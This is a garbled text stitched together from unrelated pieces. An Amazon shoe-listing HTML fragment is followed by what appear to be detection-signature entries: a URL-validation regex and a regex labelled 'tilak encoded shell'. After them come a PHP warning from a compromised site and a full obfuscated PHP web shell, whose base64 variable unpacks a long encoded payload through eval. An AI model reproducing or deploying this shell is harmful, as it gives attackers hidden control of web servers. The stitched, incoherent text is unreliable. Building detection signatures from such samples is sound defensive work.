{list-style : none}; </style> <li id="SalesRank" style="list-style : none"> <b>Amazon Best Sellers Rank:</b> #36,542 in Clothing, Shoes &amp; Jewelry (<a href="https://www.amazon.com/gp/bestsellers/fashion/ref=pd_dp_ts_fashion_1">See Top 100 in Clothing, Shoes &amp; Jewelry</a>) <style type="text/css">.zg_hrsr { margin: 0; padding: 0; list-style-type: none; }.zg_hrsr_item { margin: 0 0 0 10px; }.zg_hrsr_rank { display: inline-block; width: 80px; text-align: right; }</style><ul class="zg_hrsr"> <li class="zg_hrsr_item"> <span class="zg_hrsr_rank">#39</span> <span class="zg_hrsr_ladder">in&nbsp;<a href="https://www.amazon.com/gp/bestsellers/fashion/ref=pd_zg_hrsr_fashion_1_1">Clothing, Shoes &amp; Jewelry</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/7147440011/ref=pd_zg_hrsr_fashion_1_2">Women</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/679337011/ref=pd_zg_hrsr_fashion_1_3">Shoes</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/6127771011/ref=pd_zg_hrsr_fashion_1_4">Athletic</a> &gt; <b><a href="https://www.amazon.com/gp/bestsellers/fashion/679351011/ref=pd_zg_hrsr_fashion_1_5_last">Women's</a></b></span> </li> <li class="zg_hrsr_item"> <span class="zg_hrsr_rank">#129</span> <span class="zg_hrsr_ladder">in&nbsp;<a href="https://www.amazon.com/gp/bestsellers/fashion/ref=pd_zg_hrsr_fashion_2_1">Clothing, Shoes &amp; Jewelry</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/7147440011/ref=pd_zg_hrsr_fashion_2_2">Women</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/679337011/ref=pd_zg_hrsr_fashion_2_3">Shoes</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/6127771011/ref=pd_zg_hrsr_fashion_2_4">Athletic</a> &gt; <b><a href="https://www.amazon.com/gp/bestsellers/fashion/679377011/ref=pd_zg_hrsr_fashion_2_5_last">Walking</a></b></span> </li> <li class="zg_hrsr_item"> <span class="zg_hrsr_rank">#284</span> <span class="zg_hrsr_ladder">in&nbsp;<a href="https://www.amazon.com/gp/bestsellers/fashion/ref=pd_zg_hrsr_fashion_3_1">Clothing, Shoes &amp; Jewelry</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/7147440011/ref=pd_zg_hrsr_fashion_3_2">Women</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/679337011/ref=pd_zg_hrsr_fashion_3_3">Shoes</a> &gt; <a href="https://www.amazon.com/gp/bestsellers/fashion/6127771011/ref=pd_zg_hrsr_fashion_3_4">Athletic</a> &gt; <b><a href="https://www.amazon.com/gp/bestsellers/fashion/679360011/ref=pd_zg_hrsr_fashion_3_5_last">Women's</a></b></span> </li></ul> </li> </div> <ul class="a-unordered-list a-nostyle a-vertical a-spacing-none"> <li><span class="a-list-item"> <span class="a-text-bold"> Average Customer Review: </span> <style type="text/css"> /* * Fix for UDP-1061. Average customer reviews has a small extra line on hover * https://omni-grok.amazon.com/xref/src/appgroup/websiteTemplates/retail/SoftlinesDetailPageAssets/udp-intl-lock/src/legacy.css?indexName=WebsiteTemplates#40 */ .noUnderline a:hover { text-decoration: none; } </style> <div id="detailBullets_averageCustomerReviews" class="a-spacing-none" data-asin="B07F9GS3VY" data-ref="dpx_acr_pop_"> <span class="a-declarative" data-action="acrStarsLink-click-metrics" data-acrstarslink-click-metrics="{}"> <span id="acrPopover" class="reviewCountTextLinkedHistogram noUnderline" title="4.1 out of 5 stars"> <span class="a-declarative" data-action="a-popover" data-a-popover="{&quot;max-width&quot;:&quot;700&quot;,&quot;closeButton&quot;:&quot;false&quot;,&quot;position&quot;:&quot;triggerBottom&quot;,&quot;url&quot;:&quot;/gp/customer-reviews/widgets/average-customer-review/popover/ref=dpx_acr_pop_?contextId=dpx&amp;asin=B07F9GS3VY&quot;}"> <a href="javascript:void(0)" class="a-popover-trigger a-declarative"> <i class="a-icon a-icon-star a-star-4"><span class="a-icon-alt">4.1 out of 5 stars</span></i> <i class="a-icon a-icon-popover"></i></a> </span> <span class="a-letter-space"></span> </span> </span> <span class="a-letter-space"></span> <span class="a-declarative" data-action="acrLink-click-metrics" data-acrlink-click-metrics="{}"> <a id="acrCustomerReviewLink" class="a-link-normal" href="#customerReviews"> <span id="acrCustomerReviewText" class="a-size-base">221 customer reviews</span> </a> </span> <script type="text/javascript"> P.when('A', 'ready').execute(function(A) { A.declarative('acrLink-click-metrics', 'click', { "allowLinkDefault" : true }, function(event){ if(window.ue) { ue.count("acrLinkClickCount", (ue.count("acrLinkClickCount") || 0) + 1); } }); }); </script> <script type="text/javascript"> P.when('A', 'cf').execute(function(A) { A.declarative('acrStarsLink-click-metrics', 'click', { "allowLinkDefault" : true }, function(event){ if(window.ue) { ue.count("acrStarsLinkWithPopoverClickCount", (ue.count("acrStarsLinkWithPopoverClickCount") || 0) + 1); } }); }); </script> </div> </span></li> </ul> <div class="a-row"> </div> <div class="a-row"> If you are a seller for this product, would you like to <b><a href="https://sellercentral.amazon.com/cu/contact-us?categoryId=30002&amp;typeId=30005">suggest updates through seller support</a></b>? </div> </div>
///// ASIN FAMILY v3
2018-12-24T04:29:41.000Z
^[\w.:\/%?&=-]+$
https://demo.test.io/auth/oauth2/realms/root/realms/consumer/authorize?res_type=code&cl_id=demo&scope=openid%20profile&red_uri=https%3A%2F%2Fdemo.test.io%2Fauth%2Fdemo%2Fcb-basic.jsp&state=af0ifjsldkj&ui_locales=de
Validate UrlParams
2018-05-16T07:08:52.000Z
tilak encoded shell
^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*(?:<[^>]+>\s*)+.{0,350}?\$uexploit =\s*"zxzhbcuyocuynyuzriuynmd0.{0,180}?yosuzqg==";\s*\$an0n_3xploiter =\s*"p8v8eisdaeoiuwndedcndmzxbmbhwzx[\w\+\/]+";\s*eval.{0,50}?urldecode\(base64_decode\(\$uexploit[\)]+;\s*exit[[:punct:]\s]+$
<br /> <b>Deprecated</b>: Methods with the same name as their class will not be constructors in a future version of PHP; DbClass has a deprecated constructor in <b>/home/lmvt2ziv/public_html/southerncarpetinc.com/a.php(4) : eval()'d code(1) : eval()'d code</b> on line <b>1793</b><br /> <?php $UeXploiT = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRBbjBuXzN4UGxvaVRlUiUyOSUyOSUyOSUyOSUyOSUzQg=="; $An0n_3xPloiTeR = "P8v8EIsDAEOiuwNDEdcNDMzXbmBhwZxqDFhr1HnAfL3y1v8jDzIYgJenuabj75LQ8clh7ThkhumsfefpWIFq4wksEXhuIFLvHjaoyrfekXKkcxueYvV7vzt9rKpOZjcw59CSPXzNRPmReyynECjF+b+tdgMfi0XXGS4Db4yONd+ZGGS15W20WF4nSnqewPs1i1vyF9C9hoApqX5MwvGy0WVzrnqto2zInMk9viN8kVS0KSbYQt8Llb2PpW+lzoanYHzy/31kqW3mqXLCcy8pxYXkpNw2qZ6CS1qZTqR6XWgq8pLh2YU6hsalQYF++mpjwTlgUlwgO7NSTXKBr3iGz1hM+gWdNjCHHCIulzjNiE3VBXLKiufVUi9I/PLPm9duf9SKcChc66P/4ftApgD7V5dqiwZcE70apvWAx+DAg9X4gXIAK0zrI7R/3Yp4D1miMuyXjP/wvPlqC9KOjPFK2p+EsUuwN482jrPRNU4LO+YUgeuv53ES/dSRcu9pUvv04GaQBd0vlhwa6Fbyp4J/V27fjS8hrQ8YaUQFXr0h67vqiIxQhTwVf2dc1YQvo/YcM8Cpp+eLdK0VguH5iuuZbJV6V9VEi28/Ucf44y1c8Mn29jLEWpvIeQN4sUb9QO8mOL+s+y7LRwYpFdiXrKDrXG5Pk8MULktu51sLIoMf2G4ONKpuqaNRPb2o/FDhVXv4LzRYcUGmyevGCG3hjL5iG5SfkBDA6vcPksa4WyxP6R6S3SXr31Woq/xtx/aH2DK7HmK/UajrQfLRCDCoVaOmG+Q8OLt7bTPCBHEsvIEiHvf4X2xt7bW3F8ikcz7lOETLLYImE9wHDqTUPmbafhuiBQQYlfxOWl9SxGwzZmI63xe9356yVFqUoaREH6XVZNpMqn2t7DOPDddiXoR3wDmlgkytpx17SJi3Zt6K0d2yAfZcRo7PQ1cmi+06MPIswXb8VmY+qiSy7Zyc3afSQ1AYCSFCWj2mU7II5FQALQjmH/mtCO92B+y19Xap38Tse2v6vRauN9ir0Pe/99KiTdJsJI/zz/b7IcFYHqxJnEB+eRCM8Ub/UC4rJn5AOgQP9me/0tp/yVI06w2fXv2u9whLoB7+00EalF6HyeYDILkIFZ6QYDrrpWtBQuE7fbi6mwNXuU0QD78WwqdLsVXY871f8U7+hLwA//0QDHrAd1kLnbi2fT5QK1Mbx0TzYfQr2kL1tCfNYNfmoviMokpitRh6EoaGPy6W+/XQZVIjlh2ap+5oOBnzrZZyiHG5/jpP0IIgxmGuPZWnlbBJkGIlvVOkIc5PbGTXLsMCsYvYQ+DvmZsZaYk9mGnvOUxFah7G+oSuRtMa3z7zKfaQIjg4bxI0qvIs4fL81RplqAgfM6CO0VgXQ91rsW3cUjiqe09JMNXf2o/sc4DHlBXbRaIjfwWn1XCDBJWMUELDWt5mLUGdFLwvU54x/b088yf2N1uQvN7YhZfptZx51cMKvvANTERks4C4zqEXyWe3p73H8t79NspQjx6Ru19xuSfTLych1jf6hFrp+wBzo1LQXjWNn7D4tHpne6/L287l06Pb3TyAHp77vnpv7Y0Oo1UikhpZZQfC0+tBEXmNn7aIHo/iP9sxf8gks/AnUceULyZhfBQDlvjgY0NuKaV+qgdKFBPFCAsHXCVP9yIoTIsrnDiFT78g7oNLdSHKED6XeJaHfKgXjeYw9AAcvXJWmtZCB+3rpqtApnaW8vgYqz8unf8xpNYGhZe5Q6j5Eyeytmh5/Pd3FpLvp5bWb16r1rI6ZdzAJ3BAk/T6qpkyD6uiZdztTv0Kh8qK5M0QFEg4acVZh0dzP1RirdClC2JX3qzuvKH+airmxMWlTTJ8fMdJjPK3QCGvv3uVAUjdWEc08+/+7HhMdjwIAzLb1IYlM3CZlwhBGbFRsswme/fk/RoWfuP+u9O0m/eaGe3TbwnS2l/iaQlYQ9SaZXpMH9xHv7++y7zI1npwmixNFgd8FYUUDormlppmnBhqUPCQmme8f58TnFk1m5t0vgv6YmLfSd5reOgDkniTrv0gHC0O+0+8sI5Odwg4cuJnOpXILuOGIRjauqsoWrn/0Oo9eDxmpHU4DA42mZkyMQUxonLOPT4ssZu58INk+290nrTGEVXoy5J7w9q/toeDDXdqnnrcKZEi8R58L+v1GHyzvUA4jl1ir34dB+PiunGUfAf353s8ZAOs/w9pdRIqPh7K9S5S5kA+csd59dgzcXAN8CM78GMX9GoTu1WjRS/flphG/UQFFPT62G/7zHIuCK2D8deFC6IdGYE2QU2YTsr/5cPBeX2fqyZb8/cwMyuJOudBwVMZCZSdM+lmOjJ/sMDkfdJ0F6ergDxkqHkes181bjNAFl8ZbG53qKOnKE6mnZd7dAogzDou2oQLrWuCfgTjPSyRe7PYhOk2r9Wd7U7ZoYna/4WQR3x/tRe3QWNwdiBITgf9H8W6py3nni8wmSRzCPH6BPftY8r7V97+7g835bseLZSDOv9zZyb9EhWpsGr2v7SeKTiy/Vj5GvzeHFfFTZe6jlHAbTDBojVgPjSbP3Xvujr+J/gK2QqM9DAu9+OFzNaCf/Fwyn2bBUH6v21JrAxvNOcO186wC1ExtbybAsOK96cac1jJvJdba+ktkEqq1sv5PNEQxDe/9X+2E2Jc/O0FV+1WyeUM9aay6bqI+5GBUKFqOHGNSHq8QxGcdsgib89giduc3TTp2/MoG8tSKM4H8b1w39T9JPQCmiJLGQP+13suB01kCbjWJ4rtnBuPJJLtm/bzH8aR8MIW3yfvvgJ/KY0cINIatuSbrSO0Ls7zAfJQIHzIo9HkBxbzZ2+ll/HKP2W6A2ePO/VXedu3OU5XO3J0TDG3byIjfYo6I3Aww1W856lPMszghi7Q0Qor3axpLB4BPeRHvqKIC0zvSLIE70u5XQHE5uRvOcJYtr2tvdX/z1lK5xnsSJi3Cpdw3R5s3M6fwGgZjQ5PEKo69TpCDzmggcqhgY6p3GzwOKn3+ri1sQKNwdu3KpbaI3XrDG9xAtTyeHvsFt5jFCulzdMiPjMtDWz47yTQ4PWqepgvmm3V3ExsnYr8JT9b3mO83eLnDklHSv5GSPmW9YoTdswyNdWa3RM6wURCWoXrlN1LtJ/Mp5Ck2Q77OXIbWS1lsCfVkXuXbVgKLedEev2B5D6MVypmD212cWQzSbtIyRvmLWB367Zxru+Rli88ECj64YKCcH4fxL5gYAJ6FsICmTDGcC78WHNdl6uVh7pdNhoYlEz4PrzNmuLQWgkdRySPOzFUpDM0qFwwh+r5H9XKxM96mKMvJJp9o7RB1doIn/DWePaDAHf4Vo1Cxjb+d9+SaBz+uBnt6V9PI7oJjCPheo+07KnTpmyLCMXPV+Ueb9JML1fSbAvWZMynmpl9NJlB3KJhQDvyZ86y3vFr/gqq6ovNM4SU5MxwCvffmTFs5kR+fLhK5s/rEhz2DNyMHjDE5+m8SnuXxS74AvjyRBEdU2vaPvHFwjYWmnIREzds4Qq+SKmQsekt7VPnIZlFVUN6f8oDL+XNrZT4wC1qzNiUNmyYoZzM8IiHRclsXz2WM1C4Ytv+s+oEgb/KV9qsk1Nb9sH10exLlkSvg7941O+DiKF9JkjunJq07pEDDyWs+DBkaoz/brfpMqpGbpkg/y2vjc7vk8YQWzYbjzekExGdE/ozeEp6kb41Xe0T1bZjmD4mLFUiCqkPE9BMJV+Jkg2iXCpUdM0p9owijvvmydWFao/T1uy8mI/GI2pq/57T+5qwFMebK8dsJjrqNOc52/JMMZLUv1kub3EnuVmroSz7L56CNqP+za3u2Mr+Vf2L1UcryXyJsYs4H132j5H3Cnz+9Vx6lWNhNRuSyCtkYN62/bcyccZQV4z8H3MZbei1077FokE5gJq7mjhCN3u+90AsJ1xHcrVfb667CC/OQM/eTnn13cZ8NUT5NpfK5oahxFZEC/eZx3Ec6jUAOff2BXzCWZHrOxBQP+jGoogPn4GSIbM7uzMSljr+uZXApMhoMRPH8EjBLgvT26Ks9ywzYJTJ1+5cL8+g0FWIMc/0NIhGf2dUqL8Y1SFfn4hOMaZwDBG5PP8OO/m70r2Q5yrubEjRchBqteHNIN8DJ7La0EolezVyxPD7ZChlb3X6NLNce0ixRVOW/j3zuXvqr7Zbhbv/424vUzISHpJQeLtJ8W3wr4ThtRWuWFaM0ivBl3COUi05TVslKhU7vnqCcEK3Ka5s1+3sqTqM+rUe6Tm7+2m6popFb91lJtWyCc0qbmtymahRkQlJlntYrOwL1rpN5+8IhFy1z8gNTMzc2Vn1zol7a5vJjqnLgyMU3pwC2V9OCjMHPUo4us+Of6vNjy9nmRsqRuj1Ox+mCkZDt5OqC1doGkazT0B9n+fZUY/os+YxybVnhxi5xKXvs7GS21P765au4jufI/ja6Kof4YtaOngDfVaF3l7JqthG0JnHbbvb/O9wwa5dzLP+uH+W/A+jnnKFylK5GGhsMj1SMgz+vsesJmUELayBy6DnzUChR1XJYSSptVxu38P5+ZXM9ioXh7UbFZcNBIzsC4PFWIXF0CS5qtuhH8A1sLpfgWmmB2F+6dTPOf8eIFfxbhBLOz6nXQ1nK5i/wzKfffcr1uzHGgssNMBg68E7/fp07tkGY/ydNw3NeG6c7BiDAd+QkXb+dbMvu8n8UcC+zH+b7M359b0/OL4H6mDSMUlnkPoJAbuVKkO5z82ZEYtonb/j/bXqQ6ePEk9xpYDNlZNbGHK2N+RF1nRl/cmG6mnppz1uIspSeUprP/7xvz0vefwypCogy73+dvUGko4aSl9ACEPfK6KwbyjDykXhShpcQnWLfBQXRVXkrg28iYkR9vGhGq10lbYDgyEzeTTn5td3FhqjAZwDjSmJ12PDdtlZd5/hTqPQr83uVwge1Ttb9AJAAJlC4nBXH1WWDPY2xnyg4LfxmL5O+A0yv79Pw4a1GM7rW8j+5ffly+4vcc8PxjPScU9TRvviei0VE74qdYdzW3bAR56/d8/qsFwSJd1wQ6ixIMSsd/pd8FQHYtajkOR33T9hzanH33JyxU+/mC9xQCw5V13U+b0GDLrjV4eIXxudFKK9TBkiaTr099Z+/YbfBQKEE2+TN5z7/6dGci6Rjb1+r3wWJC8kPTx+im/Oq1nMN6rI/Yy5A+oJe6Kb5lNDBQGIGpC8Itsj7hzX9uSTLrZjxd5g5v4h/40Po9OuUNHExDUeORNMd+v3GZ2VWVG8sZ3ucJlp4fyuO33rXDaSO7NBFASHuNojIuUFzgeHSVd6YDUv+lo0fmfgzDb1A2WfGv6nFGisA8iPzRVzSjc3fIiBkGyY17/HS3ntE+/7We9PzNAlRH3+66kwe56nMXqDlK9u1PPVjTPhTCun5PEUIM/ZQdp99anG0C1NRRfF6z0CalShZppu+bsfDEu+20ZzTQKvAbzKcdSLdoUYYT21UEnKMs+yEK8HTzzPEP302ya3f18mPmjnZEBc3f75K9Wil4WJHPeOFrpgUvehq8MtZRYphL+YqARCgWbUGMFRlJz0aW5o1fVxaAsvrfX1V6B90m2zACipn+lCp9mIk0dtiK/EzRxfGMRM1upwhvmYjMF4T142MUbjBgqCwuSPTpdyiF+Lmgbk8SRLPOk6WWcyq5fR3J204TUVJPKrJE1RyzSl1OqutZjsH9xKJdHesMyuOwuBa8mIsU3qoZLVKCbVHvwex4E5iyBxOljz67KXzjwuHPmmv/lE1OcvmOOhch5EsWs19igIkpKa4UZPqlWcqrde4Tn5yLcjlSwXIfuUlED0Ob7u+2xL13VUf/O1Ge7Kg2DNQN60CMAsDgRN7R0Mtz8WAKFclnMYurWBT8U7eegk3Wi1D2Qq/zWQUHS9oTOodvOC+rfo/vjXvlsRFvgLaixjHL+56yUjpnHqW+lQAAHcdnPdFPLSHkftb5GJlPA4L22Zmk7VuhPILXHz26hWHcXK/UFcXdBUYfkNljbnXq58fm3EshslbdItPzmELXC0CTZ1JDn5phLL8ClL3eWqv8o25bYwzZaOLLLwq/wbXQUpKxBCBNqNvMTT1f2bujFAUBZk1NQzL4AB6FMPlLDPl1x8YH4xABcShyLL1MQkiw30UiLGV01Htc4gyCfRaoHF52a83igGG+3eAYsg+4iAC4LcN69L0LJlhO56Tc7lVx9+Mb/5T5LaUi7R1ekdMxvoal17KwJOHVIixD5ib78fttrsVHrekn5GezB9tF76wdxgANA7JVwDsYo7Xrr+NAlcAwqjr9haa4gG9F8U5Q1uJgrYMVaYXpF5QdJrZkh+Q6K3M17GYzYaHtf348+rnXSS70Jq0A3vqtJOB0Msk0cuf+kpfMp+blA4JSEOgrEGqRt1/vSgHV29k0Onwa7If2ldw3a8G1xVP7vKqXbkhusSLKZnbApjxlrDFFSB6j5oCXyBn8ogu52ybdFV6LVNdHWOiVO2cYOpzzsN0Sw/puNCOortxJI7EqQ47Cnzd7s16yTEw8mzjv/3+6Mm8MQEtUceneGrCwmfn1bUD9s2abD9yebwq/yx4bipR256d6XuT/ctNTdSJflMODtnuMxGvk9frJpX35ynXMor5CT2E+zyleEFe4F3nvscuI0LJ1/0UeP99feRaphqEiuach/QPha5e/0lPkGq+m2m50LeMnb4RXQkuEB+hawZYkpz4fj1BdGeNvcifOL3nEpd1CsX8ED5UeObu45Xp67GI6WYB2IKIkIWuEKqOAjQu/Jqu5by/3XUkuz773d35dtuSNrl44BmSLk8yxtxV4oN7WELpvV1JAifoWuXF/HL/549sooj/yLUju3qiL7yeIU40XDoLSnixLGgO9lFfrozg3tgOkZNCuqK1YyvrtscFlBcgbFMfuM7GqZffyD/wOG+OmIa4GQ7pEroBD7P1ue8Azte53kuMSyJlRJt6ga40hroHlm2GEiAPX+hs8iCt77l69ZhVEf7d9ZWKY9bhqe88vk8t0Xs1c3v+RP1M1Hh9i7UcpqHLfSl5qxvAR38vGjk6rXAz1KIpwm4teVPbEoDTQUTTJUhqJe6jI8DMTHChEVsWjiVZ7cj0n1zrRSwt9gIgMuWypyjnMxQ3pccnY//Fee+v+ORfOl+Sg6fPoYv6rPx9p6hMXl4llLkopta/roPgmbmgCyxUf+y4WQVJxsvUfrbCvmVBwYWd9DP61G/x7aGivbBJ2TLrVxpfva81vlV/cUV/o4J/Fz9wZkjMj0MWp+ajlokck1TxMq7jDW/aWA5BVMA65GIgNCuphYXv1IAHEPzf9W6dYJxjrzjx4fOlJNrGqgZsj5HXv3LVOsjurY8fivy5MHJ2qg5nf6p7h2wBEpH/CejePkqjxHI//bvIDERlCtoCvcIjHrIRoI2DSx6xIAIroXInrhHMzVnFhtPyToAmbKLIo2GwrDcVGnVV3bv7ScoxyMITvdTQqwle4YWnj0mOsy7E2a7fPJTpOeJNLp+HBlkZ2h7zKghyc9Yyo24u5JYNJ+1RYvhGfyYgLQmVL6dUDy5+O7QZvQZ0C5B4KbDsvrlBdvY+NCnmg/of3dxSaPZQ5WfFskt76nO6RGROWuyIV5Arbnwn2aAMPb54VXEQF7DlA78z33l4ocZVqNvAE5ZfXtk89XNJ1dd3WO+wjlR0ktbL/0T1jgpGs/DIej3jf48bXnLw+z9RUzmehE060KJReVouBXi8icYlW0IOUOVgo4PUXzrD3PvWh9p22Zc51PPqy/dBXTvYDxge/trrlR3pHWt3vMTOSomzbM/r5xSIT/rqbu+yxl9Fp6urw2BpFo56eXSYD2Rq9Zy27K0fc9eUwrPcJIqruOgBihAx0Ob2dM7yNdDQwkjA77vBk6A7JC+yGN4n1grz9+77HT2l53gB7u84mAJTylPdjcPGQTOFifPmdskgU1/G4n1oZKkBaQEpvlQBf15VXEJlbB/0yJJYnpAAeGSiIeByPExZZKznauLQDf//kLSt+hWT6AG2ZL2j9OB+LVN3SIpfEcL4zUY0qcFtuoXQYfWdc8lXeRGrQV4yBa+aqMnMo6re+pP28+KcMSVxK8Tx9H1aEYRFxjrbV8RKUn+Y1PYGwFEAhf23MqR6sPOOJN2Y+WVzdz14Jbdih6e+gQBIu8Jsv8JP2nQgEanA3mi0Yc3i3OwTwmhQj8gdXYAmQCzOOxMwuH9vKSf3jec6LhDi3f4zNt0yQZTuVzXPtHWyBEAYBtA15q/I9hvEqBoBVRnuODk2hHP5D98I9QkX+V89vL40LYCSEAgoFFJC+LLqTWAwpe1xLOxXWrS19uoiEkMEo7uqaOPaBnCGTwXiAFF+D47oNOPxcQ7yJiRHJm2VnWe5Aaf6wcdePu8C29Pa3xNTsYP+wof5dc0uVx7BSeJEUUr9c+Cy2STmxQG3VTsOSvoIlxf04VgFKEoIO9+kOUYfGVvMktEZTxY4UduF4OBwwfX9tUY/nCwOcACRGFLzvlOgl/XfXpTX4TqyjzZsbgPfwVvv/mRO835coQuR/8p3BMgr8Y4icaoKXhjaEU4y3TXlYk1tH1txWRlPlQ7vApAP+QRhsuZG9F+NW6B0aAC/rVUWz0nVLkj25sacjRYlfV7d1NtqShzZZ6BRuJAUanVK23r/89avUceIqUOG9wt5n9mI1q0NAfV49h8BEMdNaX/c01jrd9nJbMxJ8pCzJ8Yz35ThYLV+QsabjZsrL0mkhuspbRC2h56kLybgN6FWeM3WEdcNZ2CspItqH2WEchy1L6UiwhM2DSsYYn/mVhbCz1KAYiDCmRJ4jmr+GOKgZuv6ZqHfm1sQxtTc7Q6CvKRvV6hl9oKcXcVSC77Zg2iZbC6jurV9RAI7oXgSQrwhj/DZda/T+fOZ5TZ83Bq0Rjalbf3bgMoS62GVj4VgeOmZQhk7Ec6v0ucRSFHR7auMTbDiODienL0C+yx8teNZEkSX4Egmu18v+UlXEUgDp8bTv+/+IcyB9u/NkqK9RpGZmcpW0CibJDEjbJ9I86daxeN8XWSX67XShlV6XX0QA4NO6c+rFTEiGs4PNH5tDPxBNyLOI8hMrwtQLdzdB5BnuWBadow2T8JffrndK593tJ8rX5IDB2D9xAw15NyrAko8iYnYXysh2wp/ROpLkzXkgr4VGkwDu/7/S7RUFlSTwOnvteYxm3F+8CDjBzAG29Hme8PxwBDyFjWntdmVihI5z+Mkngn6U7vPAvJ2hiCndP+pN3s+1DixlkMVhbB5MdfqBKYJj24LxTadobylc+vTTzOfeZcjOEDW80Z21OzzGFpt+Aa++Nc2IlACu/1vkeRDUo3Vq6g+P7lCnpv+fRapT6Zez6VC3ZTn71b5TviGG7+JiI5kdOfFt08VBmvgnno604BnTNm479MSk8vwFzpaBa/Gis2r+15jlFBEnpRY+ARAPA/G8HIdktboBO3yZoVtBBO/63CkyHKSNwDHlLQtCCIr9eGeGdQoWnv3w4FKepzGIGdDuC1qUCuwYVuTWED5smr+md956I55eygn8NkCtcP3s6Sj/fLqOnAaO0cxYRTs66zw85axPx4iJiXNw6MTxPPIeO4+j4oSphF9sM1zRFfI3O2O+GN6v5u82TkRzDaf3OdReRnrhhOB2TAR1zHRW6BFgqIVJTo+0GyoZkN0lOycbpSWgF4FLbe8WQrFMlieActbAAuEyj7X9tUw7GJ2sgN35/yXzvh8Q0MUw82e+i7A2aevCvKIRqx+MDGqKol6Qo+JjXFi3ch3vesOAaoySETk4e/PZHgebZ293AWvYScCzi5g0rp4C20JHRJyjJQwc7BrmYuTm+IGk0S+kiv5Z3qxxhwJDb53BSQmLr5SC5S5tF9ps5zjw/MfyIp+7EKKhwELVm143Po5k3ls/Rigg6cVEuYsajUUPGJ7Mnf8LKFYcen9lseI3F27ktyH/uwfh5cIujDrkOd04T5ve0P7BsY7CDLChUqadUWriQtn5BYRjL+ZBc7y9pyp6MT8lnAyIl+ATFeucTj0Z1+pgAktintVsetIX3qfkdJ8LvEdiw0pa2TkUW8ymQ3CAzFn2kfSrw36Ekb9aB354yhaD4VN0r9Kgis+9CUtl15A3XWI7PPLfdtz46ycjFTBm8WSdEohWw6S+FUGyDBTGNNU6oIHdLf67UUL+jJ04GEbkjQ3PAqtnp86BtWGVwaUyUervwEZ9tGeRWuHoRg+mThlLx9mQjFAAvkatBuQxiHUPyhl1FtTov2fL4p5Gv+uPvHrrZPcjPnLtQfGCDOnXURkmKJoE/WeCk9ZYAxZ7E7fpQQnhSd7LtheT+irV7SuKoZt/HKmIua6/+oTtKwFCN6pxkWCc1tUs20BrUp175WY4wcA3p+vxWOs3KRM3h0Jubt71CSvjs5X/7vmH1hxlJUbb7qMBU6gE2VI5xlAYLk2PKjb2RECfbPqVnqqVUuexU/tCMWj+5YgtHRwKlz1JKo4D1hhrwellkxxB23jphp/MgcqYRl34SCOdwD4gsci1Bd+sHEIWQ36uPBQ9NzbqEFZAjZ87zgPE24Z9X2wPQIXJU4d3o1oSbF5VcXeyonJDnTaxcdrPOoveeb2O18+uL+mxZfHmltL8zxYJqU8iXXzyKL7pVsVNFhKgNA5Xp+obz3EhxmC5FijF4CGwG7gAJoCD4hs8pZ3/lSziq4Ns0N5qnqv5jDCCmUjLWqe1NhLI02ZDY36jHM7St1lHJMDXBRyzdFw6qQ1QFNRDaaOEVOWBb4fRnXPFKwecxej/MgCnz3TQBU6cO/OK/q2iEvn6e6ob1H5m3hNJSJ+Iez7CsA5c07sVwIZwExi52yKf8QXs/wjZqSYV7P3tl43zk+esV97sk3VwMfF4HJiSri+5/24rGXUEWclHEzgzs/Wq7BytZaSqULDP7VT5dMKJn4NEywPGIye171egnY9GVdkmzSVfP7+nQhEzR/2tVkLrisd3LMzBYk6jKOpdKgP8VPf0fPfn8NQYJ3PGUlyCghhbifFIAFvT9ZoNnwRso65o7jgl+Yt7jrXDXXRqIKvQ+4ojuLL5TCXzEjwaoTkJA5cGFXafnvErR/rZIOQbwXSMWmXDBeetutZBhvaecP6LyVvBI6L7F5KYq6X4ZRx4FZgxx6P72y0+j3CXplKDIuzGAxs54aNu3RYfMxENkhKSoj58faT/fNTI8dFkpEiIovu5rpjbG3L6wkaVGAVcfEpYAMPe2wd64RYdikU4l9sDHq5/0THkYd9MK234XotCkwWbQJCMOZ42HLfY3AwpS+2U2g4Jz3vC6+j1be7AXoim7qcyAIxLj1TMU+sO1ln7Hov2NviaJLyyQwF6/BcfXvIYTUwaOIjRGyxpo4deJAw5Qf/J7j/qhFlOdkYsUPrnDfi73sPAGZ8qJe9I7WgQMWUdXghSY1JEJ8J6/j9J5rfbwn1em46jUGOoTU/dg4ymwd1hCZN9t9M83Jlbgw80OTy1c3EYwt228J0RqEZRW/YXOZ4BxQxyG5jB0anssyVkELl27dKuV4kd11Bei7Xrxnv5JOeqvhI/MrzZBNmMs5RQW1N4GDXoA2/3ODwTH6wYTV7mHOUXBcYM4qADq+HD3wFxABSVd/n7d4VxDZY+BI+9sOW/E06sbr5P8v+ZtCpvkTXD5WcHyyzch3vWPKk1bdbkeLE5ypa1PgShrH7BFMg7Js4fyNA39oRu+YXq4KCCND2jVNBqN6eZy5l9O3sP2Gb5J78LwWCG/tke6POpXdXdcKaA65O658B7/5Nzt8RxNzasX/zLhTQgTgeY/B7jvOj5W9jN1VlRtWzUbPICPjM8+mEbY2uvMWZYxvZihcjnFPSd3nnYZUzZsCUlL98STIJvcdWgd+V9KdKxpi2JqUssMqdJZdXFG2f7s8rbBf1ZnE0jmhwz1HpRU9IBLhUZUhQ5B7dLpMC7UB6F8mU12pN7eCIK3Ux8Sp50XeV7FOSxizw31rosqsk6UXEKIDWrQHfB3XrU/bRWzl0Dg5n1B1d2ccAg4er6aMAZa1ms9XRlqUwfaCkkxkntSLmw9vlW3BPSBFWet75XDfIa7GVhynKTqzMFIVd5+eXRqOLQj0HzdHi+2kikVERPD6SeL0OkhuDfR6nn2+CJYGXuefsLv7dPN9BxuLv7DhpSwWisObqJH1aHTeucY9HJgFiVsQyH5U5nvnSphURh81xOdp6NenVAc1BH3GksoRRuHi9bJxV9q/vt+/HOmwUTunDq8T12arLGJo9Ixo2fB9N45oEWUrFd6WS/vy